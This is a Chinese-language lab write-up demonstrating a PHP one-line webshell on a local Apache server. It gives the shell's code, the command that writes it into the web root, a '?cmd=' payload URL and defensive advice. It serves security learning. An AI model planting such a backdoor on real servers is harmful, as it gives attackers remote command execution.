利用PHP一句话木马实现远程控制

1.实验背景

在网络攻防中，“远程控制”是攻击者获取权限后的重要阶段WebShell（网页后门）实现这一目标的常见手段之一。本次实验旨在通过最基础的PHP代码，理解“一句话木马”的工作原理，并演示如何通过Web请求在目标服务器上执行系统命令。

2. 实验环境

• 网络：Kali Linux（既作为攻击机，也作为受害Web服务器）

• Web服务：Apache HTTP服务器

• 工具：Firefox浏览器、终端终端

3.原理分析

本次实验的核心是一个非常简短的 PHP 脚本，被称为“一句话木马”：

<?php system($_REQUEST['cmd']);?>

• system()函数：这是PHP的内置函数，用于执行外部程序（系统命令），把执行结果直接输出到浏览器。

• $_REQUEST['cmd']：这是一个PHP超全局变量，用于收集通过URL（GET请求）或表单（POST请求）提交的数据。在这里，它负责接收攻击者传递的cmd参数。

  攻击逻辑： 攻击者访问 URL -> 提交cmd=ifconfig-> PHP 脚本接收参数 ->system在服务器执行函数ifconfig-> 结果回显给攻击者 ->实现远程控制 。

4.实验步骤

第一步：启动Web服务

由于Kali默认关闭Web服务，首先需要开启Apache：

sudo service apache2 start

(注：上图第二个指令是验证服务是否开启的方法，如果看到绿色的active (running)字样，说明服务已经启动成功。)

第二步：配置木马文件

Web服务器的默认根目录位于/var/www/html/。我们需要在该目录下创建一个名为shell.php的文件。（注意：必须放在这个目录下，否则Web服务无法解析）

# 这里使用命令行直接写入，也可以用编辑器编写 sudo sh -c 'echo "<?php system(\$_REQUEST[\"cmd\"]); ?>" > /var/www/html/shell.php'

第三步：构造Payload进行攻击

打开浏览器，构造特定的URL对本地服务器发起“攻击”。

• 目标网址：http://127.0.0.1/shell.php

• Payload：?cmd=ifconfig(Linux下查看网络配置的命令)

5. 踩坑与排错记录（故障排除）

在实验过程中，我遇到了以下两个典型的报错：

问题1：无法连接

• 现象：浏览器提示无法连接。

• 原因：我习惯性地在地址栏输入了https://。但本地Apache默认只开启了80端口（HTTP），未配置SSL证书。

• 解决：将协议改为http://。

问题2：404未找到

• 现象：连接成功，但提示找不到文件。

• 原因：我将shell.php直接写在桌面（Desktop）。Web服务器无权访问桌面，它只能读取/var/www/html/下的文件。

• 解决：使用mv命令将文件移动到正确目录：

  sudo mv ~/Desktop/shell.php /var/www/html/

6. 实验结果

再次修改上述问题后，访问http://127.0.0.1/shell.php?cmd=ifconfig，页面成功显示了服务器的网卡信息（eth0, lo等）。

(注：上图展示了利用漏洞成功获取服务器IP配置信息的过程，证明远程命令执行成功)

7.总结与安全警示

通过这个简单的实验，我深刻理解了Web应用漏洞的简单。只要有一行代码，如果没有被防火墙拦截或查杀，就可以让攻击者“反客为主”，轻松执行系统命令。

• 防御建议：在开发中应严格过滤用户输入，取消配置system、exec等敏感函数，以及文件上传目录的执行权限。

• 声明：本文仅作网络安全学习记录，禁止用于非法用途。